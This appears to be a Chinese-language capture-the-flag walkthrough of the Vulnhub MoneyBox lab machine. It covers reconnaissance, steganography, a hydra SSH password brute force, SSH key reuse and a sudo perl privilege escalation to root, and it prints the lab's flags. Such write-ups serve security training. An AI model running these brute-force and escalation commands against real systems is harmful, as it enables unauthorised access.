Vulnhub之Monkeybox详细测试过程（不同的Shell获取路径）

Monkeybox

识别目标主机IP地址

1. ─(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                             
4.                                                                                                                                                             
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                          
10. 192.168.56.100  08:00:27:10:8b:6f      1      60  PCS Systemtechnik GmbH                                                                                   
11. 192.168.56.244  08:00:27:ce:e9:a8      1      60  PCS Systemtechnik GmbH                                                                                   

复制代码

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.244
NMAP扫描

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.244 -oN nmap_full_scan
3. Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-05 21:45 EDT
4. Nmap scan report for bogon (192.168.56.244)
5. Host is up (0.00021s latency).
6. Not shown: 65532 closed tcp ports (reset)
7. PORT   STATE SERVICE VERSION
8. 21/tcp open  ftp     vsftpd 3.0.3
9. | ftp-syst:
10. |   STAT:
11. | FTP server status:
12. |      Connected to ::ffff:192.168.56.230
13. |      Logged in as ftp
14. |      TYPE: ASCII
15. |      No session bandwidth limit
16. |      Session timeout in seconds is 300
17. |      Control connection is plain text
18. |      Data connections will be plain text
19. |      At session startup, client count was 4
20. |      vsFTPd 3.0.3 - secure, fast, stable
21. |_End of status
22. | ftp-anon: Anonymous FTP login allowed (FTP code 230)
23. |_-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
24. 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25. | ssh-hostkey:
26. |   2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
27. |   256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
28. |_  256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
29. 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
30. |_http-title: MoneyBox
31. |_http-server-header: Apache/2.4.38 (Debian)
32. MAC Address: 08:00:27:CE:E9:A8 (Oracle VirtualBox virtual NIC)
33. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
35. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
36. Nmap done: 1 IP address (1 host up) scanned in 10.33 seconds

复制代码

NMAP扫描结果表明目标主机有3个开放端口：21（ftp)、22（ssh)、80(http)
获得Shell

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
2. └─$ ftp 192.168.56.244
3. Connected to 192.168.56.244.
4. 220 (vsFTPd 3.0.3)
5. Name (192.168.56.244:kali): anonymous
6. 331 Please specify the password.
7. Password:
8. 230 Login successful.
9. Remote system type is UNIX.
10. Using binary mode to transfer files.
11. ftp> ls -alh
12. 229 Entering Extended Passive Mode (|||6250|)
13. 150 Here comes the directory listing.
14. drwxr-xr-x    2 0        0            4096 Feb 26  2021 .
15. drwxr-xr-x    2 0        0            4096 Feb 26  2021 ..
16. -rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
17. 226 Directory send OK.
18. ftp> get trytofind.jpg
19. local: trytofind.jpg remote: trytofind.jpg
20. 229 Entering Extended Passive Mode (|||34432|)
21. 150 Opening BINARY mode data connection for trytofind.jpg (1093656 bytes).
22. 100% |****************************************************************************************************************|  1068 KiB    7.82 MiB/s    00:00 ETA
23. 226 Transfer complete.
24. 1093656 bytes received in 00:00 (7.79 MiB/s)
25. ftp> put test.txt
26. local: test.txt remote: test.txt
27. 229 Entering Extended Passive Mode (|||17931|)
28. 550 Permission denied.

复制代码

• 目标主机允许匿名FTP访问
  
• 不允许匿名用户上传文件
  
• FTP服务版本没有漏洞可利用
  

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
2. └─$ steghide extract -sf trytofind.jpg                        
3. Enter passphrase:
4.                                                                                                                                                             
5. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
6. └─$ stegseek trytofind.jpg            
7. StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
9. [i] Progress: 99.72% (133.1 MB)           
10. [!] error: Could not find a valid passphrase.
11.                                                                                                                                                             
12. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
13. └─$ exiftool trytofind.jpg      
14. ExifTool Version Number         : 12.44
15. File Name                       : trytofind.jpg
16. Directory                       : .
17. File Size                       : 1094 kB
18. File Modification Date/Time     : 2021:02:26 04:48:17-05:00
19. File Access Date/Time           : 2023:04:05 21:48:25-04:00
20. File Inode Change Date/Time     : 2023:04:05 21:48:25-04:00
21. File Permissions                : -rw-r--r--
22. File Type                       : JPEG
23. File Type Extension             : jpg
24. MIME Type                       : image/jpeg
25. JFIF Version                    : 1.01
26. Resolution Unit                 : inches
27. X Resolution                    : 72
28. Y Resolution                    : 72
29. Image Width                     : 3984
30. Image Height                    : 2988
31. Encoding Process                : Baseline DCT, Huffman coding
32. Bits Per Sample                 : 8
33. Color Components                : 3
34. Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
35. Image Size                      : 3984x2988
36. Megapixels                      : 11.9
37.                                                                                                                                                             
38. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
39. └─$ binwalk -e trytofind.jpg
41. DECIMAL       HEXADECIMAL     DESCRIPTION
42. --------------------------------------------------------------------------------
43. 0             0x0             JPEG image data, JFIF standard 1.01

复制代码

对FTP下载下来的文件没有分析出有价值的信息。

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
2. └─$ gobuster dir -u http://192.168.56.244 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.js,.txt     
3. ===============================================================
4. Gobuster v3.5
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.56.244
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.5
13. [+] Extensions:              php,html,sh,js,txt
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/04/05 21:53:48 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /.html                (Status: 403) [Size: 279]
19. /index.html           (Status: 200) [Size: 621]
20. /blogs                (Status: 301) [Size: 316] [--> http://192.168.56.244/blogs/]
21. Progress: 222012 / 1323366 (16.78%)^C
22. [!] Keyboard interrupt detected, terminating.

复制代码

gobuster工具识别出目录/blogs

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
2. └─$ curl http://192.168.56.244/blogs/   
3. <html>
4. <head><title>MoneyBox</title></head>
5. <body>
6.     <h1>I'm T0m-H4ck3r</h1>
   
8.         <p>I Already Hacked This Box and Informed.But They didn't Do any Security configuration</p>
9.         <p>If You Want Hint For Next Step......?<p>
10. </body>
11. </html>

复制代码

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
2. └─$ curl http://192.168.56.244/S3cr3t-T3xt/
3. <html>
4. <head><title>MoneyBox</title></head>
5. <body>
6.     <h1>There is Nothing In this Page.........</h1>
7. </body>
8. </html>
11. <!..Secret Key 3xtr4ctd4t4 >

复制代码

这会不会是图片的密码？

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
2. └─$ steghide extract -sf trytofind.jpg
3. Enter passphrase:
4. wrote extracted data to "data.txt".
5.                                                                                                                                                             
6. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
7. └─$ ls -alh
8. total 1.1M
9. drwxr-xr-x  2 kali kali 4.0K Apr  5 22:00 .
10. drwxr-xr-x 19 kali kali 4.0K Apr  5 21:43 ..
11. -rw-r--r--  1 kali kali  136 Apr  5 22:00 data.txt
12. -rw-r--r--  1 root root 1.5K Apr  5 21:45 nmap_full_scan
13. -rw-r--r--  1 kali kali   12 Apr  5 21:48 test.txt
14. -rw-r--r--  1 kali kali 1.1M Feb 26  2021 trytofind.jpg
15.                                                                                                                                                             
16. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
17. └─$ cat data.txt                           
18. Hello.....  renu
20.       I tell you something Important.Your Password is too Week So Change Your Password
21. Don't Underestimate it.......

复制代码

说明两件事情：

• 用户名renu
  
• 密码比较弱，可以破解
  

但是不知道是FTP还是ssh,先尝试ssh

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
2. └─$ hydra -l renu -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.244
3. Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
5. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-05 22:01:46
6. [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
7. [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
8. [DATA] attacking ssh://192.168.56.244:22/
9. [22][ssh] host: 192.168.56.244   login: renu   password: 987654321
10. 1 of 1 target successfully completed, 1 valid password found
11. [WARNING] Writing restore file because 3 final worker threads did not complete until end.
12. [ERROR] 3 targets did not resolve or could not be connected
13. [ERROR] 0 target did not complete

复制代码

成功得到了用户renu的密码

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
2. └─$ ssh renu@192.168.56.244           
3. renu@192.168.56.244's password:
4. Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
6. The programs included with the Debian GNU/Linux system are free software;
7. the exact distribution terms for each program are described in the
8. individual files in /usr/share/doc/*/copyright.
10. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
11. permitted by applicable law.
12. Last login: Fri Feb 26 08:53:43 2021 from 192.168.43.44
13. renu@MoneyBox:~$ id
14. uid=1001(renu) gid=1001(renu) groups=1001(renu)
15. renu@MoneyBox:~$ ls -alh
16. total 40K
17. drwxr-xr-x 5 renu renu 4.0K Feb 26  2021 .
18. drwxr-xr-x 4 root root 4.0K Feb 26  2021 ..
19. -rw------- 1 renu renu  642 Feb 26  2021 .bash_history
20. -rw-r--r-- 1 renu renu  220 Apr 17  2019 .bash_logout
21. -rw-r--r-- 1 renu renu 3.5K Apr 17  2019 .bashrc
22. drwxr-xr-x 3 root root 4.0K Feb 26  2021 ftp
23. drwxr-xr-x 3 renu renu 4.0K Feb 26  2021 .local
24. -rw-r--r-- 1 renu renu  807 Apr 17  2019 .profile
25. drwx------ 2 renu renu 4.0K Feb 26  2021 .ssh
26. -rw-r--r-- 1 renu renu   64 Feb 26  2021 user1.txt
27. renu@MoneyBox:~$ cat user1.txt
28. Yes...!
29. You Got it User1 Flag
31. ==> us3r1{F14g:0ku74tbd3777y4}

复制代码

1. renu@MoneyBox:~$ cat .bash_history
2. cler
3. ls
4. ls -la
5. cd /home
6. ls
7. clear
8. cd
9. ls
10. ls -la
11. exit
12. clear
13. ls
14. ls -la
15. cd /home
16. ls
17. cd lily
18. ls
19. ls -la
20. clear
21. cd
22. clear
23. ssh-keygen -t rsa
24. clear
25. cd .ssh
26. ls
27. ssh-copy-id lily@192.168.43.80
28. clear
29. cd
30. cd -
31. ls -l
32. chmod 400 id_rsa
33. ls -l
34. ssh -i id_rsa lily@192.168.43.80
35. clear
36. ssh -i id_rsa lily@192.168.43.80
37. cd
38. clear
39. cd .ssh/
40. ls
41. ssh -i id_rsa lily@192.168.43.80
42. su lily
43. clear
44. cd
45. sudo apt install openssh
46. sudo apt update
47. sudo apt install openssh-server
48. sudo service ssh start
49. sudo service ssh status
50. clear
51. cd /etc/
52. ls
53. cd ssh
54. ls
55. nano ssh_config
56. ls
57. nano sshd_config
58. clear
59. cd
60. ls
61. ls -la
62. chsh bash
63. chsh
64. clear
65. su root
66. clear
67. sudo apt install openssh
68. su root
69. exit

复制代码

从用户renu的历史命令可知，可以ssh到另一个用户lily

1. renu@MoneyBox:~$ cd /home
2. renu@MoneyBox:/home$ ls -alh
3. total 16K
4. drwxr-xr-x  4 root root 4.0K Feb 26  2021 .
5. drwxr-xr-x 18 root root 4.0K Feb 25  2021 ..
6. drwxr-xr-x  4 lily lily 4.0K Feb 26  2021 lily
7. drwxr-xr-x  5 renu renu 4.0K Feb 26  2021 renu
8. renu@MoneyBox:/home$ cd renu/.ssh/
9. renu@MoneyBox:~/.ssh$ ssh -i id_rsa lily@192.168.56.244
10. The authenticity of host '192.168.56.244 (192.168.56.244)' can't be established.
11. ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
12. Are you sure you want to continue connecting (yes/no)? yes
13. Warning: Permanently added '192.168.56.244' (ECDSA) to the list of known hosts.
14. Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
16. The programs included with the Debian GNU/Linux system are free software;
17. the exact distribution terms for each program are described in the
18. individual files in /usr/share/doc/*/copyright.
20. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
21. permitted by applicable law.
22. Last login: Fri Feb 26 09:07:47 2021 from 192.168.43.80
23. lily@MoneyBox:~$ id
24. uid=1000(lily) gid=1000(lily) groups=1000(lily),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

复制代码

1. lily@MoneyBox:~$ cat user2.txt
2. Yeah.....
3. You Got a User2 Flag
5. ==> us3r{F14g:tr5827r5wu6nklao}

复制代码

得到了第2个flag
提权

1. lily@MoneyBox:~$ sudo -l
2. Matching Defaults entries for lily on MoneyBox:
3.     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
5. User lily may run the following commands on MoneyBox:
6.     (ALL : ALL) NOPASSWD: /usr/bin/perl

复制代码

参考GTFOBINS网站的方法进行提权：

1. lily@MoneyBox:~$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
2. # cd /root
3. # ls -alh
4. total 28K
5. drwx------  3 root root 4.0K Feb 26  2021 .
6. drwxr-xr-x 18 root root 4.0K Feb 25  2021 ..
7. -rw-------  1 root root 2.1K Feb 26  2021 .bash_history
8. -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
9. drwxr-xr-x  3 root root 4.0K Feb 25  2021 .local
10. -rw-r--r--  1 root root  148 Aug 17  2015 .profile
11. -rw-r--r--  1 root root  228 Feb 26  2021 .root.txt
12. # cat .root.txt
14. Congratulations.......!
16. You Successfully completed MoneyBox
18. Finally The Root Flag
19.     ==> r00t{H4ckth3p14n3t}
21. I'm Kirthik-KarvendhanT
22.     It's My First CTF Box
23.          
24. instagram : ____kirthik____
26. See You Back....
27.       
28. #

复制代码

至此得到了root shell以及root flag

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！